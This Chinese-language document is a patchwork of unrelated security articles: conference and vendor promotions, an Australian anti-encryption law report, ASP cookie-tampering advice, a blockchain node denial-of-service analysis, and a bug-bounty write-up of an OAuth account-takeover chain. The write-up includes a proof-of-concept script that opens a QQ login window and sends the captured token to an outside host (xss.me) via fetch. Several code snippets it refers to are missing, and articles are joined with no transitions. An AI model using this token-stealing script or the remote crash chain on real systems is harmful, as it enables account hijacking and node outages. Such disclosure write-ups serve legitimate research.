作为江苏省唯一一家省属地方法人银行，江苏银行从2007年1月正式开业开始至今已经走过了十多个年头，也见证并亲历了这十多年里网络安全环境的风云变幻。在企业安全防护建设上也积累了丰富的经验，值得其他业内同行借鉴和学习。

江苏银行安全部经理王心玉，将会从实践出发，介绍中小银行在人员较少、事务繁杂的情况下如何实现自动化资产与威胁发现、从原理上怼自动化攻击进行动态防护、通过多维度分线关联分析发现潜在威胁并实时响应、利用欺骗防御技术进行精准攻击识别和追踪溯源。

CodeSec互联网安全创新大会（FIT）是由国内领先的互联网安全新媒体平台CodeSec.Net主办的年度互联网安全盛会，WitAwards互联网安全颁奖盛典也将同期举行。

FIT 2019大会会期为 2018年12月12日～13日 ，会议将在 上海宝华万豪酒店 举行。本次大会主论坛议程聚焦 「全球高峰会」、「前沿安全神盾局」、「WitAwards颁奖盛典」、「WIT安全创新者联盟」「X-TECH技术派对」、「HACK DEMO」 六大板块，独立分设 「白帽LIVE」 及 「企业安全俱乐部」 两大分论坛，与来自全球的安全从业者、优秀技术专家、企业安全建设者、白帽安全专家、研究机构等共同展开演讲与探讨。同时 「中国首席信息安全官高峰论坛 」、 「漏洞马拉松线下邀请赛」 也将在特色分会场同期举行。此次盛会致力于分享2018年度安全行业创新硕果，共同探索与展望未来安全新边界。

>>>【FIT 2019官网】

在最近参与的一次对站点A的众测中，我发现A可以使用QQ账号进行登陆。在过去的几个月里，我发现了大量关于OAuth登陆劫持的漏洞，如果你有兴趣，可以参考： OAuth回调参数漏洞案例解析

尽管我相信目标A已经不存在OAuth登陆劫持漏洞（因为QQ已经在redirect_uri参数上做了强校验），但是我仍打算对它的登陆流程一探究竟。

下面，我以A.com代表目标A的域名来展示我是怎样发现一个账号劫持漏洞的。

打开A的QQ登陆链接后，我发现了一些奇妙的事。

如上图，redirect_uri并没有指向A.com，而是指向了B.com。将参数URL解码，

不难推测，这里涉及到2次跨域登陆：

在开头已经说过，QQ已经对redirect_uri参数做了强校验，要想劫持到B.com的登陆账号已经不太可能。所以，我的目标放在了s_url这个参数上。

简单分析一下登陆流程就能发现s_url是如何工作的。

(a)首先，用户使用QQ账号登陆到B.com；

(b)然后B.com发送如下请求，获取token，并引导用户携带token跳转到A.com；

(c)A.com验证token是合法的，则种下cookie。

至此，用户成功登陆到A.com。

从整个登陆流程来看，只要我们能想办法窃取到token，就能劫持用户的登陆账号。

我的目标是窃取到token，最直接的办法当然是修改参数s_url，让用户携带token跳转到恶意域名，从而泄露token。

一番测试后，我发现s_url的校验也很严格，即使在路径后面附加一些字符，生成的跳转链接中都不会携带token。

经过一些fuzz后，我发现我似乎能在最后一个字符后面附加一些符号。

我可以在s_url的结尾附加3种符号，而不影响token的生成，分别是:

# 让我眼前一亮，众所周知，URL中的 # 将被浏览器视作锚点，其后的数据不会发送到服务器。

当用户跳转到这个地址，自然会无法认证成功，并停留在Login页面。

此时token也将出现在URL中。

至此，我们已经在窃取token的道路上迈出了重要的一步。

现在，我们面临的问题是如何获取到URL中的token。

最容易想到的就是XSS啦，我们可以用XSS创建一个iframe，在iframe加载登陆链接，当跳转完成后，再获取iframe的 location.href 属性。

一番寻找后，我终于找到一处疑似存在DOM-XSS的函数，

验证后发现确实存在，payload:

但是这个XSS必须用户登陆后才能触发，如果能找一处登陆CSRF，就能使得漏洞更通用了。

其实在前面已经提到了这个漏洞了，

这个请求不会检查referer，携带未使用过的token请求这个链接就能登陆成功。所以，只要我们事先准备一个没使用过的token，让受害者请求这个链接就行了。

接下来理一下整个利用过程：

在打开OAuth登陆界面这一步我原本打算使用iframe，但是测试后发现在iframe里无法无法跳转到A.com，因为B.com使用了如下代码来防止iframe加载，

但我们可以使用 window.open() 开一个新窗口来绕过。

以下是我写的一个POC:

evil.html:

1.js:

document.body.onload = function () { // 打开OAuth登陆界面 myWindow = window.open('https://graph.qq.com/oauth2.0/show?which=Login&display=pc&client_id=111111&response_type=code&redirect_uri=https%3A%2F%2FB.com%2Flogin%2FqqAccessCallback%3Fs_url%3Dhttps%253A%252F%252FA.com%252FIndex%252FLogin%2523%252FLogin%26fwd_flag%3D7&state=aaa', '', 'width=600,height=600'); setTimeout(function () { // 获取token data = myWindow.document.location.href; fetch("//xss.me/?data=" + escape(data)); }, 9000); };

关于区块链安全的资料，目前互联网上主要侧重于钱包安全、智能合约安全、交易所安全等，而很少有关于公链安全的资料，公链是以上一切业务应用的基础，本文将介绍公链中比较常见的一种的DoS漏洞。

公链客户端与其他传统软件的客户端没有太大区别，在传统软件上会遇到的问题在公链客户端中都有可能遇到。

所以要让一个客户端发生Crash的常见方法有：

使程序发生运行时异常，且这个异常没有被容错，例如 数组越界 、 除以0 、 内存溢出 等。

使系统环境不满足程序运行的要求，例如 创建大数组造成的OOM 、 无 限递归造成的OOM 等

多线程死锁

其他

公链节点可被轻易攻击下线的危害是巨大的，比如会使网络算力骤减，从而导致51%攻击等。

本文根据亦来云的这几个漏洞主要介绍的是由OOM所引起的Crash漏洞。

本文主要对亦来云公链0.2.0的以下价值20ETH的4个漏洞进行分析：

servers/interfaces.go 漏洞代码片段：

根据以上代码可以发现 DiscreteMining 函数会接收一个 param 参数，并从 param 中取出一个值赋值给 count 变量。

然后 count 变量会被待会 make 函数中

通过官方文档了解到 make 函数是用于创建数组的，而数组的长度由第二个参数控制，理 论上只要第二个参数很大，就会产生一个占有大量内存的数组，从而导致OOM。

而 ma ke 函数的第二个参数可以通过 param 参数来控制，所以只要 param 参数是远程可控的，就可以远程使节点Crash了。

最终在 httpjsonrpc/server.go 中发 DiscreteMining 能通过rpc接口远程调用，而目前的客户端是默认开启rpc并绑定公网地址的，所以可以对公网上任意节点发送恶意包使其Crash。

StartRPCServer 函数代码片段：

core/payloadwithdrawfromsidechain.go 漏洞代码片段：

这里同样是由于 make 函数的第二个参数由参数r控制，只要r可控就可以使 make 函数引发OOM，从而Crash。

在 servers/interface.go 中的 SendRawTransaction 函数中发现间接的调用了 Transaction 的 Deserialize 函数，具体如下：

根据如上标红代码可以发现 SendRawTransaction 函数会先取RPC接口传来的 data 参数复制给变量 str ，然后变量 str 会转换为 bytes 复制给变量 bys ，最后 bys 变量会被带入 Transaction 的 Deserialize 函数中。

再看看 Transaction 的 Deserialize 函数：

func (tx *Transaction) Deserialize(r io.Reader) error { // tx deserialize if err := tx.DeserializeUnsigned(r); err != nil { //略 return nil } //略

参数r被带入了 Transaction 的 DeserializeUnsigned 函数中，继续跟踪一下：

在该函数中会先通过 GetPayload(tx.TxType) 来取到 tx.Payload ，然后会调用 tx.Payload 的 Deserialize 函数，只要能控制 Payload 的类型为 PayloadWithdrawFromSideChain ，就可以触发 PayloadWithdrawFromSideChain 的 Deserialize 函数，而 Transaction 是通过RPC接口远程传来的，所以tx对象的字段都是可控的。

最终的利用链：RPC的 SendRawTransaction 接口-> Transaction 的 Deserialize 函数-> Transaction 的 DeserializeUnsigned 函数->通过 GetPayload 取到取到 PayloadWithdrawFromSideChain 对象->调用其的 Deserialize 函数->触发 make ->OOM

还是上面的 Deserialize 函数引起的OOM，不过触发点不同。

这次的触发点是在 servers/interfaces.go 中的 SubmitAuxBlock 函数中：

新浪科技讯 北京时间12月6日下午消息，据彭博社报道，周四澳大利亚下议院通过了全球最为严苛的反加密法律，进一步推进该国为强制Facebook等其他科技巨头协助警方调查恐怖主义和有组织犯罪解密聊天信息而制定法律。

根据警方和情报机构有望获得的新权力，科技公司或可被要求解密WhatsApp、Telegram和Signal等平台上的通讯记录，甚至插入代码以协助获取数据。尽管该立法在周四时候已得到澳洲两大主要政党的支持，上议院仍未点头许可，意味着该提案能否正式生效至少需要等到2月份才有结论。

科技公司与政府在隐私和安全问题上已然争论不断，新的法律势必将会把澳大利亚推到全球舆论的风口浪尖。2016年，英国赋予当局破解、拦截和保留所有英国公民通讯记录的权利，而中国的《网络安全法》则要求互联网运营商积极配合刑事和国家安全调查。

针对该立法，总理斯科特莫里森（Scott Morrison）政府表示，该国95%的人民受到使用加密信息的安全机构的监控。政府网络安全顾问麦吉本（Alastair MacGibbon）表示，这项技术导致执法人员很大程度上“无法有效执法”。

包括Facebook和谷歌等公司在内的数字产业组织（Digital Industry Group）与大赦国际（Amnesty International）和墨尔本的人权法律中心一道，大力反对该立法。批评人士警告称，该立法或将破坏互联网的安全性，危及从在线投票到市场交易和数据存储等的各种活动。

据悉，该立法还需要由议会委员会审查12个月。新的权力仅适用于处理极端犯罪行为。并且，针对所谓的“技术能力通知”――即强制公司修改其服务协助警方获取数据的通知――也会受到严密监管。

墨尔本皇家理工大学的格利高里认为该法律的效力会超越恐怖主义或刑事犯罪活动之外，并渗透到私人调查领域。昆士兰理工大学的研究员马恩也认为，“这项立法在透明性、问责、监管以及滥用的潜在可能性和范围等各方面都存在尚未解决的问题。”(小白)

一个朋友有个很古老很古老的网站，使用了asp搭建，流量还很大，最近测试了下 WEB园，性能提升很大。需要改 session 为 cookie 方式保存 会话信息，让我给提 安全方面的建议。

实际 Session 和 Cookie 除了保存状态，安全方面都差不多。唯一需要注意的就是 不要 通过 cookie 保存 用户敏感信息（比如密码），防止中间人获取信息。密码加了md5也不安全，因为还有cmd5.com。另一个需要注意的就是 用户 可以通过 js 伪造 cookie信息。

以下面的例子为例：

正常 用户登录后，会保存 用户的状态，比如下面的代码：

其他页面如果需要判断用户登录信息，可以通过判断cookie，一般代码如下：

正常是没有问题的，加入 用户比较懂技术，可以通过 js 修改用户名和级别：

这样就悲剧了，如下面的演示，用户名和级别可以随便改。

修改方法也比较简单，在 用户登录成功后，增加个 单独的 cookie，比如hash，代码如下：

读取用户时，读取 hash 判断是否相同，如果不同，则cookie被篡改了

这样用户通过JS修改cookie，也会被程序发现的。

下面的演示可以看到，cookie已经被修改。

所有相关的代码，已经打包成一个压缩包，方面大家下载测试： http://www.miaoqiyuan.cn/products/cookie_test.rar

11 月 30 日，由国家信息中心网安部主办，安徽省经济信息中心等承办的“政务云网络安全合规性工作研讨会”在合肥举行。国家信息中心网安部禄凯副主任、安徽省经济信息中心姜精如副主任出席研讨会。紫光旗下新华三集团安全产品部总监刘云峰在会上做了新华三大安全助力政务行业安全建设的精彩分享。

随着政务云的快速增长，网络安全问题层出不穷，给智慧政务发展带来严重安全挑战。在政务云建设中亟待做好网络安全合规工作，以提升政务云的网络安全水平。目前政务云网络安全技术合规性依据主要包括网络安全等级保护、云计算服务网络安全审查， 以及政务行业网络安全行业技术标准等。在本次研讨会上，国信北大网络安全空间实验室介绍了《政务云网络安全合规性指引》(征求意见稿)(以下简称《指引》)，新华三等多家单位参与了该《指引》的研究和编制，为政务云的安全规划、建设、运行提供参考，深化落实《网络安全法》和国家相关标准规范要求，推动政务云网络安全合规性工作。刘云峰在会上分享了新华三主动安全战略在合规层面的技术优势，向与会嘉宾解读了新华三针对云安全合规的安全云和态势感知的解决方案。

为了满足政务云安全合规建设的技术要求，在国家信息中心网安部指导下，新华三编写了《新华三政务云网络安全合规技术实施指南》，该指南于11月初通过专家评审，可作为《指引》的新华三技术参考方案。

新华三政务云网络安全合规方案具备如下优势：

与云管理平台统一纳管，可与第三方云平台对接。新华三安全云管理平台基于标准OpenStack开发，可与任何标准的OpenStack云管理平台对接，保障网络、计算、存储、安全都能自动化交付给租户。

业内领先的单次引流方案，不给云平台增加压力。新华三具有业内成熟领先的云管理平台交付经验，安全云管理平台基于新华三传统云管理平台进行深度定制开发，能够实现云平台只需单次引流，安全云内便可自动实现不同租户和业务的流量划分。

硬件架构的安全资源池，租户安全更稳定可靠。新华三安全资源池基于高性能CLOS架构开发，能满足对性能要求很高的租户安全需求，且租户的安全能力通过基于SOP的轻量化虚拟化技术交付，保障每个租户安全能力的绝对独立。

截止目前，新华三已承建了国家政务云和 13个部委级政务云、19 个省级政务云和 300 余个地市区县政务云，亦承建了国家电子政务外网及 20 余个省级、300 余个地市级政务网络的建设工作，在政务云市场连续两年保持份额第一。未来，新华三将持续助力网络安全合规性体系建设，进一步为政务云安全保驾护航。